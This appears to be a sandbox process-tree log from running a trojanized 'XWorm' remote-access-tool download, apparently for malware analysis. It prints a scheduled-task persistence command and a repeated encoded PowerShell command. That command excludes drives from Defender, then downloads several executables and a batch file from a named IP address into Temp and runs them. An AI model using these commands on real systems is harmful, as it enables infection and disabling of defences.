"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1788 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=960 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:6096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3836 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1044 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:6000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=964 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4576 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:3100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:1352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=3304 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:5036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5400 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:1160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6404 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:2252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6592 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=1932 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:1
2⤵
PID:7108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3096 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:5824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6420 --field-trial-handle=1804,i,10166146817622260652,881633563047319188,131072 /prefetch:8
2⤵
PID:340

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5324

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5560

C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XHVNC.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5400

C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XWormUI.exe
"C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XWormUI.exe"
1⤵
PID:5656

C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XWormUI.exe
"C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XWormUI.exe"
1⤵
PID:5428

C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XWorm-RAT-V2.1-builder.exe
"C:\Users\Admin\Downloads\XWorm-Rat-Remote-Administration-Tool--main\XWorm-Rat-Remote-Administration-Tool--main\XWorm-RAT-V2.1-builder.exe"
1⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
"C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe"
2⤵
- Executes dropped EXE
PID:5372

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"
3⤵
- Creates scheduled task(s)
PID:5920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2B8B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2B8B.tmp.bat
3⤵
PID:4440

C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 5372"
4⤵
- Enumerates processes with tasklist
PID:6060

C:\Windows\system32\find.exe
find ":"
4⤵
PID:6032

C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
4⤵
- Delays execution with timeout.exe
PID:1328

C:\Users\Static\wsappx.exe
"wsappx.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6140

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"
5⤵
- Creates scheduled task(s)
PID:4136

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4104

C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "http://www.bing.com/search?q=chrome.exe Google Chrome"
1⤵
PID:1020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1556

C:\Windows\System32\p6rbzy.exe
"C:\Windows\System32\p6rbzy.exe"
1⤵
PID:4780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffe5fe9758,0x7fffe5fe9768,0x7fffe5fe9778
2⤵
PID:512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:3004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffe5fe9758,0x7fffe5fe9768,0x7fffe5fe9778
2⤵
PID:6084

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5444

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:6052

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\XWorm\" -spe -an -ai#7zMap6358:72:7zEvent12377
1⤵
PID:6988

C:\Users\Admin\Downloads\XWorm\xworm.exe
"C:\Users\Admin\Downloads\XWorm\xworm.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7116

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:5276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
3⤵
- Blocklisted process makes network request
PID:6380

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
4⤵
PID:6556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7116 -s 212
2⤵
- Program crash
PID:6308

C:\Users\Admin\Downloads\XWorm\xworm.exe
"C:\Users\Admin\Downloads\XWorm\xworm.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:7048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
3⤵
- Blocklisted process makes network request
PID:5124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
4⤵
PID:6492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 176
2⤵
- Program crash
PID:7068

C:\Users\Admin\Downloads\XWorm\xworm.exe
"C:\Users\Admin\Downloads\XWorm\xworm.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:5156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
